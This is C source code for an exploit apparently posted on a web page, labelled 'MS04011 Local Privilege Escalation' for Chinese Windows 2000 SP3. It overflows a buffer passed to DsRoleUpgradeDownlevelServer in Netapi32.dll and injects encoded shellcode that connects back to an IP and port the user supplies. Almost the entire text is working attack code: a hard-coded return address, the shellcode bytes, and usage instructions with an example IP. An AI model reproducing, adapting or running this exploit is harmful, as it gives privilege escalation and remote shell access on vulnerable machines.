#include <stdio.h>
#include <windows.h>#pragma comment(lib, "netapi32.lib")
#pragma comment(lib, "ws2_32.lib")
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define MAXLEN 5000
char buf[2*MAXLEN];
char buf2[2000];
#define IP_OFFSET 244
#define PORT_OFFSET 239
//shellcode default connect back to 127.0.0.1:1981
char sc[]=
"\x90\x90\xEB\x04" //nop nop jmp 4
"\x71\x15\xFA\x7F" //pop pop ret
//shellcode begin
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4F\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";
void help(char *program)
{
printf ("======================================================\r\n");
printf (" MS04011 Local Privilege Escalation alpha 0.10 release\r\n");
printf (" For Win2k CN by SWAN@SEU\r\n");
printf ("======================================================\r\n\r\n");
printf ("Usage: \r\n");
printf (" %s <Your IP> <Your port>\r\n", program);
printf ("e.g.:\r\n");
printf (" %s 202.119.9.42 8111\r\n", program);
printf ("\r\n The ret address is 0x7ffa1571, tested on CN Win2k SP3.\r\n");
//printf ("Pre-public version, please do NOT distribute!\r\n");
exit(0);
}
int main(int argc, char**argv)
{
if(argc != 3)
help(argv[0]);
unsigned short port = htons(atoi(argv[2]))^(u_short)0x9999;
unsigned long ip = inet_addr(argv[1])^0x99999999;
memcpy(&sc[PORT_OFFSET], &port, 2);
memcpy(&sc[IP_OFFSET], &ip, 4);
HMODULE hNetapi;
int i;
hNetapi = LoadLibrary("Netapi32.dll");
if ( !hNetapi )
{
printf("[-] Can't load Netapi32.dll.\n");
exit(0);
}
DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if ( !DsRoleUpgradeDownlevelServer )
{
printf("[-] Can't find function.\n");
exit(0);
}
memset(buf, 0, MAXLEN*2);
for(i=0; i<2840; i++) //WideCharToMultiByte?
buf[2*i] =100 + (i/2)/100;
for(i=2840; i<sizeof(sc)+2840; i++)
buf[2*i] = sc[i-2840];
DsRoleUpgradeDownlevelServer(
(unsigned long)&buf[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0],
(unsigned long)&buf2[0], (unsigned long)&buf2[0], (unsigned long)&buf2[0]);
//Free Library?
return 0;
}
推荐
评论(0条)
